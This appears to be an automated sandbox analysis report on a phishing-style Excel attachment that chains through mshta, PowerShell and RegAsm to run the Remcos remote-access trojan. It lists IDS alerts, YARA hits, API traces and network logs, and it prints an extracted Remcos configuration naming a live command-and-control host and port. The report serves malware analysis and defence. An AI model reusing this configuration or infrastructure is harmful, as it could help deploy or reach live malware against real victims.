                Source: Registry Key set | Author: Joe Security | Data: Details: 40 37 8B 92 01 93 C4 CC 7F 40 26 DB C8 72 F1 63 F5 5A 9C F3 BE 40 83 FD FC 6D 64 8B 58 AC CF 00 2F DA 1F F9 8C 1A A5 00 2D D9 34 0D FB 2F E7 2F A7 46 E8 A5 28 88 4F E7 A7 62 DC C5 C3 F9 BF E2 D7 88 9A 32 F6 06 34 A1 67 CC C0 00 DC 71 45 21 86 DC 26 61 8E C2 0E 5F 73 FF BE FE 42 35 3C ED 98 5E 41 A0 96 66 64 70 C5 85 1B 14 79 33 53 69 05 8B , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 4064, TargetObject: HKEY_CURRENT_USER\Software\Rmc-GT4655\exepath
                Timestamp                        | SID     | Severity | Classtype                                     | Source IP       | Source Port | Destination IP  | Destination Port | Protocol
                2024-09-09T17:48:56.908351+0200  | 2024197 | 1        | A Network Trojan was detected                 | 185.235.137.223 | 80          | 192.168.2.22    | 49164            | TCP
                2024-09-09T17:48:59.517862+0200  | 2024197 | 1        | A Network Trojan was detected                 | 185.235.137.223 | 80          | 192.168.2.22    | 49166            | TCP
                2024-09-09T17:48:56.908349+0200  | 2024449 | 1        | Attempted User Privilege Gain                 | 192.168.2.22    | 49164       | 185.235.137.223 | 80               | TCP
                2024-09-09T17:48:59.517853+0200  | 2024449 | 1        | Attempted User Privilege Gain                 | 192.168.2.22    | 49166       | 185.235.137.223 | 80               | TCP
                2024-09-09T17:49:13.605287+0200  | 2020423 | 1        | Exploit Kit Activity Detected                 | 185.235.137.223 | 80          | 192.168.2.22    | 49169            | TCP
                2024-09-09T17:49:13.605287+0200  | 2020425 | 1        | Exploit Kit Activity Detected                 | 185.235.137.223 | 80          | 192.168.2.22    | 49169            | TCP
                2024-09-09T17:49:15.269324+0200  | 2036594 | 1        | Malware Command and Control Activity Detected | 192.168.2.22    | 49170       | 192.3.101.29    | 14645            | TCP
                2024-09-09T17:49:16.723246+0200  | 2036594 | 1        | Malware Command and Control Activity Detected | 192.168.2.22    | 49171       | 192.3.101.29    | 14645            | TCP
                2024-09-09T17:49:12.632846+0200  | 2049038 | 1        | A Network Trojan was detected                 | 207.241.227.96  | 443         | 192.168.2.22    | 49168            | TCP
                2024-09-09T17:49:16.819096+0200  | 2803304 | 3        | Unknown Traffic                               | 192.168.2.22    | 49172       | 178.237.33.50   | 80               | TCP

                AV Detection

                Source: camzeroconnect.duckdns.org | Avira URL Cloud: Label: malware
                Source: 00000011.00000002.624187857.0000000000811000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "camzeroconnect.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GT4655", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: RFQ_0230909024SEPT.xla.xlsx | ReversingLabs: Detection: 13%
                Source: Yara match | File source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000011.00000002.624187857.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.624187857.0000000000811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTR
                Source: RFQ_0230909024SEPT.xla.xlsx | Joe Sandbox ML: detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, | 17_2_004338C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_00404423 FreeLibrary,CryptUnprotectData, | 21_2_00404423
                Source: powershell.exe, 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

                Exploits

                Source: Yara match | File source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTR

                Privilege Escalation

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00407538 _wcslen,CoGetObject, | 17_2_00407538
                Source: unknown | HTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49168 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: unknown | HTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49165 version: TLS 1.2
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.pdb source: powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.pdbhP0 source: powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00407877 FindFirstFileW,FindNextFileW,17_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0044E8F9 FindFirstFileExA,17_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,17_2_100010F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_10006580 FindFirstFileExA,17_2_10006580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0040AE51 FindFirstFileW,FindNextFileW,21_2_0040AE51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 26_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,26_2_00407898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,17_2_00407CD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                Software Vulnerabilities

                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe
                Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: global traffic DNS query: name: zeep.ly
                Source: global traffic DNS query: name: ia601706.us.archive.org
                Source: global traffic DNS query: name: camzeroconnect.duckdns.org
                Source: global traffic DNS query: name: geoplugin.net
                Source: global traffic TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global traffic TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global traffic TCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global traffic TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic TCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.235.137.223:80
                Source: global traffic TCP traffic: 192.168.2.22:49169 -> 185.235.137.223:80
                Source: global traffic TCP traffic: 192.168.2.22:49172 -> 178.237.33.50:80
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.227.96:443
                Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
